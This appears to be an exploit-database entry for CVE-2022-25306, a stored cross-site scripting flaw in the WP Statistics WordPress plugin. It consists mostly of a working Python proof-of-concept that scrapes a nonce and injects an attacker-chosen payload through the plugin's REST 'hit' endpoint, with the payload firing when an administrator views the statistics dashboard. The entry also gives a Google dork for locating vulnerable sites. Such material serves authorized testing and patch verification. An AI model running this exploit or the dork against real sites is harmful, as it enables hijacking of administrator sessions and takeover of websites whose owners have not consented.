/wp-content/plugins/wp-statistics/includes/class-wp-statistics-visitor.php and others
Vulnerable Parameters
browser
Google Dork
inurl:/wp-content/plugins/wp-statistics
CVE
CVE-2022-25306
Proof of Concept (Python 3 script; needs the third-party `requests` package, everything else is standard library — run it only against a WordPress instance you are authorized to test)
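"""Proof of concept for CVE-2022-25306 (WP Statistics, stored XSS via the ``browser`` parameter).

Flow, as the original PoC does it:

1. Fetch the site's front page and scrape the ``_wpnonce`` value that appears next to
   ``wp_statistics_hit`` in the page source (the plugin's hit-tracking REST call
   evidently needs it).
2. Send one GET to ``/wp-json/wp-statistics/v2/hit`` with the URL-encoded payload in
   ``browser`` and the nonce in ``_wpnonce``.
3. The payload is stored by the plugin and, per the original write-up, fires when an
   administrator opens the WP Statistics overview page (or other pages, depending on
   the payload).

The request building is split into small pure helpers so they can be checked without
network access.  The original listing had two HTML-entity mangles in the query string
(``×tamp`` for ``&timestamp`` and ``¤t_page`` for ``&current_page``) which made the
request malformed; they are fixed here.

Only use this against systems you are authorized to test.
"""
from __future__ import annotations

import json
import re
import sys
import urllib.parse
from random import randint

# Pattern copied verbatim from the original PoC: the nonce is expected to sit in the
# front page's inline script immediately before the wp_statistics_hit parameter.
NONCE_RE = re.compile(r'_wpnonce=(.*?)&wp_statistics_hit')

USER_AGENT = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 "
    "(KHTML, like Gecko) Version/15.2 Safari/605.1.15"
)

# Seconds to wait per HTTP request; without this a slow or black-holed target hangs forever.
REQUEST_TIMEOUT = 15


def extract_nonce(html: str) -> str | None:
    """Return the ``_wpnonce`` value found in *html*, or ``None`` if the marker is absent.

    Returning ``None`` (instead of letting ``.group(1)`` raise ``AttributeError``) lets the
    caller give a meaningful message when the plugin is missing or the page differs.
    """
    match = NONCE_RE.search(html)
    return match.group(1) if match else None


def random_ip() -> str:
    """Return a random dotted-quad string (each octet 0-255).

    The original PoC sends a fresh random value in the ``ip`` parameter on every run,
    presumably so the hit is not folded into an existing visitor record — the plugin's
    exact handling of ``ip`` is not shown here.  ``random`` is fine: this value is not a
    secret.
    """
    return '.'.join(str(randint(0, 255)) for _ in range(4))


def build_hit_path(nonce: str, payload: str, ip: str) -> str:
    """Build the path + query string for the WP Statistics ``hit`` REST call.

    Args:
        nonce: value scraped from the front page (see :func:`extract_nonce`).
        payload: raw XSS payload; it is ``quote_plus``-encoded here so it survives the
            query string intact (spaces become ``+``, which the server decodes back).
        ip: value for the ``ip`` parameter.

    Returns:
        The site-relative URL, starting with ``/wp-json/``.  All other parameters are
        fixed to the values the original PoC used; ``exclusion_reason`` and
        ``search_query`` are deliberately sent without ``=``, as in the original.
    """
    encoded_payload = urllib.parse.quote_plus(payload)
    return (
        '/wp-json/wp-statistics/v2/hit'
        f'?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser={encoded_payload}'
        '&platform=&version=&referred='
        f'&ip={ip}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1'
        '&timestamp=11&current_page_type=home&current_page_id=0'
        '&search_query&page_uri=/&user_id=0'
    )


def main() -> int:
    """Interactive entry point: prompt for target and payload, send the hit, print the result.

    Returns a process exit status (0 on a JSON response from the endpoint, 1 otherwise).
    """
    # Third-party dependency imported here so the pure helpers above stay importable
    # (and testable) on a machine without `requests`.
    import requests

    # Strip a trailing slash so the site-relative path appends cleanly (no "//wp-json").
    wpurl = input('\nWordPress URL: ').strip().rstrip('/')
    payload = input('\nPayload: ')

    session = requests.Session()
    front_page = session.get(wpurl, timeout=REQUEST_TIMEOUT)
    nonce = extract_nonce(front_page.text)
    if nonce is None:
        print('\nCould not find a WP Statistics nonce in the front page '
              '(plugin absent/inactive, or the page does not embed the hit script?).')
        return 1

    exploit_url = wpurl + build_hit_path(nonce, payload, random_ip())
    print(f'\nSending XSS payload: {exploit_url}')
    # The User-Agent is only spoofed on the hit request, matching the original PoC.
    response = session.get(exploit_url, headers={"User-Agent": USER_AGENT}, timeout=REQUEST_TIMEOUT)

    try:
        data = response.json()
    except ValueError:
        # e.g. a WAF block page or a non-REST 404; show it rather than crash.
        print(f'\nNon-JSON response (HTTP {response.status_code}):\n{response.text}')
        return 1

    print("\nResponse: \n" + json.dumps(data, sort_keys=True, indent=4))
    print(f'\nXSS will trigger when admin visits WP Statistics Dashboard at {wpurl}/wp-admin/admin.php?page=wps_overview_page or other pages depending on the payload used.')
    return 0


if __name__ == "__main__":
    sys.exit(main())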